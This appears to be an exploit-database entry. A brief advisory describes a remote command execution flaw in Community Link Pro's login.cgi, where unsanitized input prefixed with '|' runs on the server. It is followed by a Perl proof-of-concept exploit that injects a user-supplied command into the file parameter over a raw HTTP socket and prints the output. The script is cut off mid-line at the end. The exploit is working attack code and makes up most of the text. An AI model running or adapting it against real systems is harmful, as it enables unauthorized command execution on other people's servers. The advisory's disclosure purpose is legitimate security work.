source: https://www.securityfocus.com/bid/14097/info Community Link Pro is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. Due to this, an attacker can prefix arbitrary commands with the '|' character and have them executed in the context of the server. #!/usr/bin/perl # ___ ___ __ # \_ |__ _____ __| _/______ ____ _____/ |_ # | __ \\__ \ / __ |\_ __ \/ _ \ / _ \ __\ # | \_\ \/ __ \_/ /_/ | | | \( <_> | <_> ) | # |___ (____ /\____ | |__| \____/ \____/| | Security Group # \/ \/ \/ || # \/ # Login.cgi Remote Command Execution PoC Exploit # by: spher3 - spher3@fatalimpulse.net # www.badroot.org use strict; use IO::Socket::INET; sub USAGE() { print "USAGE:\n", "perl $0 [host] [path] [cmd]\n\n", "EXAMPLE:\n", "perl www.site.org /webeditor/ \"uname -a\"\n\n"; exit 0; } USAGE unless $ARGV[2]; my $host = $ARGV[0]; my $path = $ARGV[1]; my $cmds = join ( '%20', split ( / /, $ARGV[2] ) ); my $vuln = $path . "login.cgi?username=&command=simple&do=edit&password=&file=|" . $cmds . "|"; print "Badroot Security Group - www.badroot.org\n", "Login.cgi Remote Command Execution\n\n", "- Target: $host\n", "- Path: $path\n\n"; my $sock = IO::Socket::INET->new ( PeerAddr => $host, PeerPort => 80, Proto => "tcp", Type => SOCK_STREAM ) || die "Error: $!\n"; print $sock "GET " . $vuln ." HTTP/1.1\n\r", "Accept: */*\r\n", "User-Agent: Bad\r\n", "Host: $host\r\n", "Connection: Keep-Alive\r\n\r\n"; my $lE = 0; while ( <$sock> ) { if ( $_ =~ /<\/textarea/ ) { $lE = 0; close ( $sock ) && exit 0; } print $_ if $lE == 2; ++$lE if $lE == 1; if ( $_ =~ /